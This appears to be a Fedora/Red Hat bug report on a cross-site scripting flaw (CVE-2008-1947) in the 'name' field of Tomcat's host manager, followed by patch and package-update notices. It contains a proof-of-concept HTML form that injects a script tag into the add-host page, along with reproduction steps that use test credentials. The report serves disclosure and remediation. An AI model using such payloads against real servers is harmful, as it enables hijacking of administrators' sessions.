Similarly to the "alias" field in bug 247994, tomcat's host manager web interface suffers from a javascript exploit in the "name" field:

Assume that after logging in, the victim was led to the malicious web server with the following file installed.

    <form action="http://localhost:8080/host-manager/html/add" method="get">
    <INPUT TYPE="hidden" NAME='name' VALUE="<script>alert()</script>">
    <INPUT TYPE="hidden" NAME='aliases' VALUE="somealias">
    <input type="submit">
    </form>

Steps to reproduce:
* install tomcat5 tomcat5-admin-webapps.
* edit /etc/tomcat5/tomcat-users.xml and add
    <role rolename="tomcat"/>
    <user username="tomcat" password="tomcat" roles="tomcat,admin"/>
* restart tomcat5
* Visit http://localhost:8080/host-manager/html/add
* login with user name tomcat and password tomcat
* Enter the following:
    name: <script>alert("name-exploit!")</script>
    alias: somealias
* hit add.
* You should see the javascript alert box popping up.
Public patch available here: http://svn.apache.org/viewvc?view=rev&revision=662582
Public now via:
http://marc.info/?l=tomcat-user&m=121244319501278&w=2
http://tomcat.apache.org/security-5.html
http://tomcat.apache.org/security-6.html
Will be fixed upstream in the upcoming 5.5.27 and 6.0.17.
tomcat6-6.0.18-1.1.fc9 has been submitted as an update for Fedora 9. http://admin.fedoraproject.org/updates/tomcat6-6.0.18-1.1.fc9
tomcat6-6.0.18-1.1.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
tomcat5-5.5.27-0jpp.1.fc8 has been submitted as an update for Fedora 8. http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.1.fc8
tomcat5-5.5.27-0jpp.2.fc9 has been submitted as an update for Fedora 9. http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc9
tomcat5-5.5.27-0jpp.2.fc8 has been submitted as an update for Fedora 8. http://admin.fedoraproject.org/updates/tomcat5-5.5.27-0jpp.2.fc8
tomcat5-5.5.27-0jpp.2.fc9 has been pushed to the Fedora 9 stable repository. If problems still persist, please make note of it in this bug report.
tomcat5-5.5.27-0jpp.2.fc8 has been pushed to the Fedora 8 stable repository. If problems still persist, please make note of it in this bug report.
https://www.redhat.com/security/data/cve/CVE-2008-1947.html